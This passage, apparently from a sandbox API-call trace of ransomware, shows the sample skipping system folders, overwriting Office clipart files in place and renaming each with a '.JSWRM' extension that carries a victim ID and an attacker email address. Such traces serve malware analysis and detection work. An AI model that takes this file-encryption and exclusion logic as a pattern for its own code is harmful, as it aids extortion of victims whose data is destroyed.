Flags=0x0, Size=0x20) returned 0x241100 [0079.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00116_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0079.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00116_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00116_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00116_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.257] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15852) returned 1 [0079.257] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3de0) returned 0x24d210 [0079.257] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3de0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3de0, lpOverlapped=0x0) returned 1 [0079.260] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.260] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3de0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3de0, lpOverlapped=0x0) returned 1 [0079.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.260] CloseHandle (hObject=0x314) returned 1 [0079.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0079.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0079.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0079.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.261] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00116_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00116_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0079.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.261] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HM00172_.WMF", cAlternateFileName="")) returned 1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2=".") returned 1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="..") returned 1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="...") returned 1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="windows") returned -1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="recovery") returned -1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="perflogs") returned -1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="documents and settings") returned 1 [0079.261] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.262] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="system volume information") returned -1 [0079.262] lstrcmpiW (lpString1="HM00172_.WMF", lpString2="msocache") returned -1 [0079.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00172_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00172_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0079.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.263] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2832) returned 1 [0079.263] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb10) returned 0x23fc98 [0079.263] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb10, lpOverlapped=0x0) returned 1 [0079.264] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.264] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb10, lpOverlapped=0x0) returned 1 [0079.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.265] CloseHandle (hObject=0x314) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0079.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0079.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0079.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0079.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.265] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00172_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00172_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.266] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10ca8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HM00426_.WMF", cAlternateFileName="")) returned 1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2=".") returned 1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="..") returned 1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="...") returned 1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="windows") returned -1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="recovery") returned -1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="perflogs") returned -1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="documents and settings") returned 1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="system volume information") returned -1 [0079.266] lstrcmpiW (lpString1="HM00426_.WMF", lpString2="msocache") returned -1 [0079.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00426_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00426_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00426_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0079.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00426_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HM00426_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HM00426_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0079.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.267] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68776) returned 1 [0079.267] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10ca0) returned 0x24d210 [0079.267] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x10ca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x10ca0, lpOverlapped=0x0) returned 1 [0079.274] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.274] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x10ca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x10ca0, lpOverlapped=0x0) returned 1 [0079.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.275] CloseHandle (hObject=0x314) returned 1 [0079.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0079.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0079.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0079.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0079.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.276] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HTECH_01.MID", cAlternateFileName="")) returned 1 [0079.276] lstrcmpiW (lpString1="HTECH_01.MID", lpString2=".") returned 1 [0079.276] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="..") returned 1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="...") returned 1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="windows") returned -1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="recovery") returned -1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="perflogs") returned -1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="documents and settings") returned 1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="system volume information") returned -1 [0079.277] lstrcmpiW (lpString1="HTECH_01.MID", lpString2="msocache") returned -1 [0079.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HTECH_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HTECH_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HTECH_01.MID", lpUsedDefaultChar=0x0) returned 12 [0079.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HTECH_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HTECH_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HTECH_01.MID", lpUsedDefaultChar=0x0) returned 12 [0079.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 